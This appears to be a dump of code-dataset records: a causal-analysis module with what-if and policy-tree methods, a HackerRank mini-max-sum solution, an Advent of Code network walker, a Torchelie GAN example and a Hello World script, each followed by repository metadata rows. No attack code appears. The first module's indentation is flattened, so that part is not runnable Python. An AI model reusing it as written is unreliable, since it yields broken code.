def _whatif_inference(self, X, Xnew, feature_index, y):
assert not self.classification, "What-if analysis cannot be applied to classification tasks"
assert np.shape(X)[0] == np.shape(Xnew)[0] == np.shape(y)[0], (
"X, Xnew, and y must have the same length, but have shapes "
f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}"
)
assert np.size(feature_index) == 1, f"Only one feature index may be changed, but got {np.size(feature_index)}"
T0 = _safe_indexing(X, feature_index, axis=1)
T1 = Xnew
result = self._safe_result_index(X, feature_index)
X = result.X_transformer.transform(X)
if X.shape[1] == 0:
X = None
inf = result.estimator.effect_inference(X=X, T0=T0, T1=T1)
# we want to offset the inference object by the baseline estimate of y
inf.translate(y)
return inf
def whatif(self, X, Xnew, feature_index, y, *, alpha=0.05):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
y_new: DataFrame
The predicted outputs that would have been observed under the counterfactual features
"""
return self._whatif_inference(X, Xnew, feature_index, y).summary_frame(alpha=alpha)
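# Illustrative sketch (hypothetical column name): counterfactual outcomes had 'price' been
# 10% lower for every sample,
#     ca.whatif(X, X['price'] * 0.9, 'price', y).head()
# The returned frame holds point estimates and confidence intervals, offset by the observed
# baseline y as described above.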
def _whatif_dict(self, X, Xnew, feature_index, y, *, alpha=0.05, row_wise=False):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
Returns
-------
dict : dict
The counterfactual predictions, as a dictionary
"""
inf = self._whatif_inference(X, Xnew, feature_index, y)
props = self._point_props(alpha=alpha)
res = _get_default_specific_insights('whatif')
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
row_data.update([(key, self._make_accessor(attr)(inf).flatten()) for key, attr in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, self._make_accessor(attr)(inf).tolist()) for key, attr in props])
return res
def _tree(self, is_policy, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
result = self._safe_result_index(Xtest, feature_index)
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
Xtest = None
if result.feature_baseline is None:
treatment_names = ['decrease', 'increase']
else:
treatment_names = [f"{result.feature_baseline}"] + \
[f"{lvl}" for lvl in result.feature_levels]
TreeType = SingleTreePolicyInterpreter if is_policy else SingleTreeCateInterpreter
intrp = TreeType(include_model_uncertainty=include_model_uncertainty,
uncertainty_level=alpha,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
random_state=self.random_state)
if is_policy:
intrp.interpret(result.estimator, Xtest,
sample_treatment_costs=treatment_costs)
if result.feature_baseline is None: # continuous treatment, so apply a treatment level 10% of typical
treatment_level = result.treatment_value * 0.1
# NOTE: this calculation is correct only if treatment costs are marginal costs,
# because then scaling the difference between treatment value and treatment costs is the
# same as scaling the treatment value and subtracting the scaled treatment cost.
#
# Note also that unlike the standard outputs of the SingleTreePolicyInterpreter, for
# continuous treatments, the policy value should include the benefit of decreasing treatments
# (rather than just not treating at all)
#
# We can get the total by seeing that if we restrict attention to units where we would treat,
# 2 * policy_value - always_treat
# includes exactly their contribution because policy_value and always_treat both include it
# and likewise restricting attention to the units where we want to decrease treatment,
# 2 * policy_value - always-treat
# also computes the *benefit* of decreasing treatment, because their contribution to policy_value
# is zero and the contribution to always_treat is negative
treatment_total = (2 * intrp.policy_value_ - intrp.always_treat_value_.item()) * treatment_level
always_totals = intrp.always_treat_value_ * treatment_level
else:
treatment_total = intrp.policy_value_
always_totals = intrp.always_treat_value_
policy_values = treatment_total, always_totals
else: # no policy values for CATE trees
intrp.interpret(result.estimator, Xtest)
policy_values = None
return intrp, result.X_transformer.get_feature_names(self.feature_names_), treatment_names, policy_values
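# Worked illustration of the continuous-treatment policy value above (hypothetical numbers):
# suppose the units the tree would treat contribute a total effect of +a, and the units it
# would not treat have an always-treat effect of -b. Then policy_value_ = a (the second group
# contributes 0) and always_treat_value_ = a - b, so
#     2 * policy_value_ - always_treat_value_ = 2a - (a - b) = a + b,
# i.e. the gain from increasing treatment where helpful plus the gain from decreasing it
# where harmful, which is then scaled by the 10% treatment level.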
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_policy_tree(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, include_model_uncertainty=False,
alpha=0.05):
"""
Plot a recommended policy tree using matplotlib.
Parameters
----------
Xtest : array-like
Features
feature_index : int or string
Index of the feature to be considered as treatment
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names, treatment_names=treatment_names)
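# Illustrative sketch (hypothetical feature name): after fitting, render the recommended
# policy for one treatment column,
#     ca.plot_policy_tree(X_test, 'discount', treatment_costs=0, max_depth=2)
# which plots the policy interpreter's tree using this feature's level names as treatments.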
def _policy_tree_output(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, alpha=0.05):
"""
Get a tuple of policy outputs.
The first item in the tuple is the recommended policy tree expressed as a dictionary.
The second item is the per-unit average value of applying the learned policy; if the feature is continuous, this
means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should
be increased, plus the gain from decreasing it by 10% of the typical amount for the remaining units.
The third item is the value of always treating. This is a list, with one entry per non-control-treatment for
discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount.
Parameters
----------
Xtest : array-like
Features
feature_index : int or string
Index of the feature to be considered as treatment
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
output : _PolicyOutput
"""
(intrp, feature_names, treatment_names,
(policy_val, always_trt)) = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
alpha=alpha)
def policy_data(tree, node_id, node_dict):
return {'treatment': treatment_names[np.argmax(tree.value[node_id])]}
return _PolicyOutput(_tree_interpreter_to_dict(intrp, feature_names, policy_data),
policy_val,
{treatment_names[i + 1]: val
for (i, val) in enumerate(always_trt.tolist())},
treatment_names[0])
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_heterogeneity_tree(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False,
alpha=0.05):
"""
Plot an effect heterogeneity tree using matplotlib.
Parameters
----------
Xtest : array-like
Features
feature_index : int or string
Index of the feature to be considered as treatment
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names,
treatment_names=treatment_names)
def _heterogeneity_tree_output(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
"""
Get an effect heterogeneity tree expressed as a dictionary.
Parameters
----------
Xtest : array-like
Features
feature_index : int or string
Index of the feature to be considered as treatment
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, _, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
def hetero_data(tree, node_id, node_dict):
if include_model_uncertainty:
return {'effect': _sanitize(tree.value[node_id]),
'ci': _sanitize(node_dict[node_id]['ci'])}
else:
return {'effect': _sanitize(tree.value[node_id])}
return _tree_interpreter_to_dict(intrp, feature_names, hetero_data)
def individualized_policy(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: DataFrame
Dataframe containing recommended treatment, effect, confidence interval, sorted by effect
"""
result = self._safe_result_index(Xtest, feature_index)
# get dataframe with all but selected column
orig_df = pd.DataFrame(Xtest, columns=self.feature_names_).rename(
columns={self.feature_names_[result.feature_index]: 'Current treatment'})
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
x_rows = Xtest.shape[0]
Xtest = None
if result.feature_baseline is None:
# apply 10% of a typical treatment for this feature
effect = result.estimator.effect_inference(Xtest, T1=result.treatment_value * 0.1)
else:
effect = result.estimator.const_marginal_effect_inference(Xtest)
if Xtest is None: # we got a scalar effect although our original X may have had more rows
effect = effect._expand_outputs(x_rows)
multi_y = (not self._vec_y) or self.classification
if multi_y and result.feature_baseline is not None and np.ndim(treatment_costs) == 2:
# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely
treatment_costs = np.expand_dims(treatment_costs, 1)
effect.translate(-treatment_costs)
est = effect.point_estimate
est_lb = effect.conf_int(alpha)[0]
est_ub = effect.conf_int(alpha)[1]
if multi_y: # y was an array, not a vector
est = np.squeeze(est, 1)
est_lb = np.squeeze(est_lb, 1)
est_ub = np.squeeze(est_ub, 1)
if result.feature_baseline is None:
rec = np.empty(est.shape[0], dtype=object)
rec[est > 0] = "increase"
rec[est <= 0] = "decrease"
# set the effect bounds; for positive treatments these agree with
# the estimates; for negative treatments, we need to invert the interval
eff_lb, eff_ub = est_lb, est_ub
eff_lb[est <= 0], eff_ub[est <= 0] = -eff_ub[est <= 0], -eff_lb[est <= 0]
# the effect is now always positive since we decrease treatment when negative
eff = np.abs(est)
else:
# for discrete treatment, stack a zero result in front for control
zeros = np.zeros((est.shape[0], 1))
all_effs = np.hstack([zeros, est])
eff_ind = np.argmax(all_effs, axis=1)
treatment_arr = np.array([result.feature_baseline] + [lvl for lvl in result.feature_levels], dtype=object)
rec = treatment_arr[eff_ind]
# we need to call effect_inference to get the correct CI between the two treatment options
effect = result.estimator.effect_inference(Xtest, T0=orig_df['Current treatment'], T1=rec)
# we now need to construct the delta in the cost between the two treatments and translate the effect
current_treatment = orig_df['Current treatment'].values
if np.ndim(treatment_costs) >= 2:
# remove the third dimension potentially added above
if multi_y: # y was an array, not a vector
treatment_costs = np.squeeze(treatment_costs, 1)
assert treatment_costs.shape[1] == len(treatment_arr) - 1, ("If treatment costs are an array, "
" they must be of shape (n, d_t-1),"
" where n is the number of samples"
" and d_t the number of treatment"
" categories.")
all_costs = np.hstack([zeros, treatment_costs])
# find cost of current treatment: the equality check creates a 2d array that is True on each row
# only at the position of the current treatment; then we take the corresponding cost.
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
else:
assert isinstance(treatment_costs, (int, float)), ("Treatments costs should either be float or "
"a 2d array of size (n, d_t-1).")
all_costs = np.array([0] + [treatment_costs] * (len(treatment_arr) - 1))
# construct index of current treatment
current_ind = (current_treatment.reshape(-1, 1) ==
treatment_arr.reshape(1, -1)) @ np.arange(len(treatment_arr))
current_cost = all_costs[current_ind]
target_cost = all_costs[eff_ind]
delta_cost = current_cost - target_cost
# add second dimension if needed for broadcasting during translation of effect
if multi_y:
delta_cost = np.expand_dims(delta_cost, 1)
effect.translate(delta_cost)
eff = effect.point_estimate
eff_lb, eff_ub = effect.conf_int(alpha)
if multi_y: # y was an array, not a vector
eff = np.squeeze(eff, 1)
eff_lb = np.squeeze(eff_lb, 1)
eff_ub = np.squeeze(eff_ub, 1)
df = pd.DataFrame({'Treatment': rec,
'Effect of treatment': eff,
'Effect of treatment lower bound': eff_lb,
'Effect of treatment upper bound': eff_ub},
index=orig_df.index)
return df.join(orig_df).sort_values('Effect of treatment',
ascending=False).head(n_rows)
def _individualized_policy_dict(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: dictionary
dictionary containing treatment policy, effects, and other columns
"""
return self.individualized_policy(Xtest, feature_index,
n_rows=n_rows,
treatment_costs=treatment_costs,
alpha=alpha).to_dict('list')
def typical_treatment_value(self, feature_index):
"""
Get the typical treatment value used for the specified feature
Parameters
----------
feature_index: int or string
The index of the feature to be considered as treatment
Returns
-------
treatment_value : float
The treatment value considered 'typical' for this feature
"""
result = [res for res in self._results if res.feature_index == feature_index]
if len(result) == 0:
if self._has_column_names:
result = [res for res in self._results if res.feature_name == feature_index]
assert len(result) == 1, f"Could not find feature with index/name {feature_index}"
return result[0].treatment_value
else:
raise ValueError(f"No feature with index {feature_index}")
return result[0].treatment_value
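# --- Editor's note --------------------------------------------------------
# Standalone numpy sketch (not part of the original module) illustrating the
# discrete-treatment cost lookup used in individualized_policy above: a
# boolean mask built by broadcasting picks each row's current-treatment cost,
# and np.take_along_axis picks the cost of the recommended treatment.  The
# names mirror the variables above, but all data here is made up.
import numpy as np

treatment_arr = np.array(["none", "low", "high"], dtype=object)      # baseline + levels
current_treatment = np.array(["none", "high", "low"], dtype=object)  # one entry per sample
all_costs = np.array([[0.0, 1.0, 2.5],
                      [0.0, 1.0, 2.5],
                      [0.0, 1.0, 2.5]])                               # shape (n, d_t)
eff_ind = np.array([2, 0, 1])                                         # recommended column per row

# cost of what each unit currently receives
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
# cost of what the policy recommends
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
delta_cost = current_cost - target_cost                               # added to the effect estimate
print(current_cost, target_cost, delta_cost)
# ---------------------------------------------------------------------------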
| 51.319196
| 119
| 0.603562
| 73,135
| 0.795257
| 0
| 0
| 1,401
| 0.015234
| 0
| 0
| 42,148
| 0.45831
|
c4083724a00de9c5692943d43c6a11f16b96a31e
| 1,365
|
py
|
Python
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 1
|
2020-10-01T16:54:52.000Z
|
2020-10-01T16:54:52.000Z
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 2
|
2020-10-07T02:22:13.000Z
|
2020-10-22T06:15:50.000Z
|
problem solving/mini-max-sum.py
|
avnoor-488/hackerrank-solutions
|
b62315549c254d88104b70755e4dfcd43eba59bf
|
[
"MIT"
] | 9
|
2020-10-01T12:30:56.000Z
|
2020-10-22T06:10:14.000Z
|
'''
problem--
Given five positive integers, find the minimum and maximum values that can be calculated by summing exactly four of the five integers. Then print the respective minimum and maximum values as a single line of two space-separated long integers.
For example, arr=[1,3,5,7,9]. Our minimum sum is 1+3+5+7=16 and our maximum sum is 3+5+7+9=24. We would print
16 24
Function Description--
Complete the miniMaxSum function in the editor below. It should print two space-separated integers on one line: the minimum sum and the maximum sum of 4 of 5 elements.
miniMaxSum has the following parameter(s):
arr: an array of 5 integers
Input Format--
A single line of five space-separated integers.
Constraints--
1 <= arr[i] <= 10^9
Output Format--
Print two space-separated long integers denoting the respective minimum and maximum values that can be calculated by summing exactly four of the five integers. (The output can be greater than a 32 bit integer.)
Sample Input---
1 2 3 4 5
Sample Output--
10 14
'''
#code here
#!/bin/python3
import math
import os
import random
import re
import sys
def miniMaxSum(arr):
l1=[]
for i in arr:
x=-i
for j in arr:
x+=j
l1.append(x)
print(min(l1),max(l1))
if __name__ == '__main__':
arr = list(map(int, input().rstrip().split()))
miniMaxSum(arr)
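# --- Editor's note --------------------------------------------------------
# Standalone sketch (not part of the submitted solution): the same answer can
# be computed in O(n) by summing once and then dropping the largest or
# smallest element; handy as a cross-check for the loop-based version above.
def mini_max_sum_alt(arr):
    total = sum(arr)
    return total - max(arr), total - min(arr)

assert mini_max_sum_alt([1, 2, 3, 4, 5]) == (10, 14)
# ---------------------------------------------------------------------------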
| 24.375
| 242
| 0.710623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,048
| 0.767766
|
c40b63017932ee0022e50a1cd077dafbac537066
| 4,610
|
py
|
Python
|
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | 1
|
2020-04-12T17:54:52.000Z
|
2020-04-12T17:54:52.000Z
|
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | null | null | null |
19/network.py
|
jcsesznegi/advent-of-code-2017
|
9710e184e092b82aa798076b9ce3915c6e42758d
|
[
"MIT"
] | null | null | null |
from pprint import pprint
from enum import Enum
class Direction(Enum):
UP = 'up'
DOWN = 'down'
LEFT = 'left'
RIGHT = 'right'
class Network:
def __init__(self, diagramRows):
self.diagram = self.setDiagram(diagramRows)
self.currentPosition = self.setCurrentPosition()
self.currentDirection = Direction.DOWN
self.route = []
self.steps = 1
def setDiagram(self, diagramRows):
splitRows = []
for diagramRow in diagramRows:
splitRows.append(list(diagramRow))
return splitRows
def setCurrentPosition(self):
startIndex = self.diagram[0].index('|')
return (startIndex, 0)
def getTraveledRoute(self):
return ''.join(self.route)
def getTraveledSteps(self):
return self.steps
def getForwardPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0], self.currentPosition[1] - 1)
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0], self.currentPosition[1] + 1)
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0] + 1, self.currentPosition[1])
def getLeftPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0] + 1, self.currentPosition[1])
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0], self.currentPosition[1] + 1)
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0], self.currentPosition[1] - 1)
def getRightPosition(self):
if self.currentDirection == Direction.UP:
return (self.currentPosition[0] + 1, self.currentPosition[1])
elif self.currentDirection == Direction.DOWN:
return (self.currentPosition[0] - 1, self.currentPosition[1])
elif self.currentDirection == Direction.LEFT:
return (self.currentPosition[0], self.currentPosition[1] - 1)
elif self.currentDirection == Direction.RIGHT:
return (self.currentPosition[0], self.currentPosition[1] + 1)
def positionExists(self, position):
return (position[1] > 0
and position[1] < len(self.diagram)
and position[0] > 0
and position[0] < len(self.diagram[position[1]])
and self.diagram[position[1]][position[0]] != ' ')
def changeDirectionLeft(self):
if self.currentDirection == Direction.UP:
self.currentDirection = Direction.LEFT
elif self.currentDirection == Direction.DOWN:
self.currentDirection = Direction.RIGHT
elif self.currentDirection == Direction.LEFT:
self.currentDirection = Direction.DOWN
elif self.currentDirection == Direction.RIGHT:
self.currentDirection = Direction.UP
def changeDirectionRight(self):
if self.currentDirection == Direction.UP:
self.currentDirection = Direction.RIGHT
elif self.currentDirection == Direction.DOWN:
self.currentDirection = Direction.LEFT
elif self.currentDirection == Direction.LEFT:
self.currentDirection = Direction.UP
elif self.currentDirection == Direction.RIGHT:
self.currentDirection = Direction.DOWN
def getNextPosition(self):
nextPosition = self.getForwardPosition()
if self.positionExists(nextPosition):
return nextPosition
nextPosition = self.getLeftPosition()
if self.positionExists(nextPosition):
self.changeDirectionLeft()
return nextPosition
nextPosition = self.getRightPosition()
if self.positionExists(nextPosition):
self.changeDirectionRight()
return nextPosition
return False
def run(self):
hasNextPosition = True
while hasNextPosition:
nextPosition = self.getNextPosition()
if not nextPosition:
hasNextPosition = False
else:
self.currentPosition = nextPosition
self.steps += 1
character = self.diagram[nextPosition[1]][nextPosition[0]]
if character.isalpha():
self.route.append(character)
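# --- Editor's note --------------------------------------------------------
# Hypothetical usage sketch (not in the original file).  The Network class
# expects the puzzle diagram as a list of strings, one per row; the file name
# 'input.txt' below is an assumption, not something the source defines.
if __name__ == '__main__':
    with open('input.txt') as f:
        diagram_rows = [line.rstrip('\n') for line in f]
    network = Network(diagram_rows)
    network.run()
    print(network.getTraveledRoute(), network.getTraveledSteps())
# ---------------------------------------------------------------------------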
| 37.786885
| 74
| 0.632972
| 4,558
| 0.98872
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.006725
|
c40cb374c8f69dbfb3dd6a423d469c3fd1845232
| 2,639
|
py
|
Python
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 117
|
2019-07-14T20:39:48.000Z
|
2021-10-17T19:16:48.000Z
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 41
|
2019-12-06T23:56:44.000Z
|
2021-08-02T09:13:30.000Z
|
examples/gan.py
|
maxferrari/Torchelie
|
d133f227bebc3c4cbbb6167bd1fae815d2b5fa81
|
[
"MIT"
] | 13
|
2019-09-22T00:46:54.000Z
|
2021-04-09T15:53:15.000Z
|
import argparse
import copy
import torch
from torchvision.datasets import MNIST, CIFAR10
import torchvision.transforms as TF
import torchelie as tch
import torchelie.loss.gan.hinge as gan_loss
from torchelie.recipes.gan import GANRecipe
import torchelie.callbacks as tcb
from torchelie.recipes import Recipe
parser = argparse.ArgumentParser()
parser.add_argument('--cpu', action='store_true')
opts = parser.parse_args()
device = 'cpu' if opts.cpu else 'cuda'
BS = 32
tfms = TF.Compose([
TF.Resize(64),
tch.transforms.AdaptPad((64, 64)),
TF.RandomHorizontalFlip(),
TF.ToTensor()])
ds = CIFAR10('~/.cache/torch/cifar10', download=True, transform=tfms)
dl = torch.utils.data.DataLoader(ds,
num_workers=4,
batch_size=BS,
shuffle=True)
def train_net(Gen, Discr):
G = Gen(in_noise=128, out_ch=3)
G_polyak = copy.deepcopy(G).eval()
D = Discr()
print(G)
print(D)
def G_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
preds = D(fake * 2 - 1).squeeze()
loss = gan_loss.generated(preds)
loss.backward()
return {'loss': loss.item(), 'imgs': fake.detach()}
def G_polyak_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G_polyak(z)
return {'imgs': fake.detach()}
def D_fun(batch):
z = torch.randn(BS, 128, device=device)
fake = G(z)
fake_loss = gan_loss.fake(D(fake * 2 - 1))
fake_loss.backward()
x = batch[0]
real_loss = gan_loss.real(D(x * 2 - 1))
real_loss.backward()
loss = real_loss.item() + fake_loss.item()
return {'loss': loss, 'real_loss': real_loss.item(), 'fake_loss':
fake_loss.item()}
loop = GANRecipe(G, D, G_fun, D_fun, G_polyak_fun, dl, log_every=100).to(device)
loop.register('polyak', G_polyak)
loop.G_loop.callbacks.add_callbacks([
tcb.Optimizer(tch.optim.RAdamW(G.parameters(), lr=1e-4, betas=(0., 0.99))),
tcb.Polyak(G, G_polyak),
])
loop.register('G_polyak', G_polyak)
loop.callbacks.add_callbacks([
tcb.Log('batch.0', 'x'),
tcb.WindowedMetricAvg('real_loss'),
tcb.WindowedMetricAvg('fake_loss'),
tcb.Optimizer(tch.optim.RAdamW(D.parameters(), lr=4e-4, betas=(0., 0.99))),
])
loop.test_loop.callbacks.add_callbacks([
tcb.Log('imgs', 'polyak_imgs'),
tcb.VisdomLogger('main', prefix='test')
])
loop.to(device).run(100)
train_net(tch.models.autogan_64, tch.models.snres_discr_4l)
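# --- Editor's note --------------------------------------------------------
# Standalone sketch (not part of the example): the standard hinge GAN
# objectives that the gan_loss.real / gan_loss.fake / gan_loss.generated
# calls above correspond to, written with plain torch ops.  This mirrors the
# usual hinge formulation and is not guaranteed to match Torchelie's exact
# implementation details (reductions, etc.).
import torch
import torch.nn.functional as F

def hinge_d_real(preds):   # discriminator loss on real samples
    return F.relu(1.0 - preds).mean()

def hinge_d_fake(preds):   # discriminator loss on generated samples
    return F.relu(1.0 + preds).mean()

def hinge_g(preds):        # generator hinge loss
    return (-preds).mean()

_p = torch.randn(8)
print(hinge_d_real(_p), hinge_d_fake(_p), hinge_g(_p))
# ---------------------------------------------------------------------------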
| 29.322222
| 84
| 0.61349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.069344
|
c40ce4ea8967938d11ba63e971d617289f172e0d
| 22
|
py
|
Python
|
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
Python/SCRIPT PYTHON/Hello.py
|
guimaraesalves/material-python
|
d56b6b24ae35a67d394b43cb1ef4420805c7bd9b
|
[
"MIT"
] | null | null | null |
print("Hello World!")
| 11
| 21
| 0.636364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 13
| 0.590909
|
c40e9360b8918f73e4cf97eef85c363173d03ce0
| 21,719
|
py
|
Python
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 1
|
2018-09-17T13:07:29.000Z
|
2018-09-17T13:07:29.000Z
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 100
|
2017-08-01T23:48:04.000Z
|
2018-04-03T13:17:27.000Z
|
hs_geo_raster_resource/serialization.py
|
tommac7/hydroshare
|
87c4543a55f98103d2614bf4c47f7904c3f9c029
|
[
"BSD-3-Clause"
] | 2
|
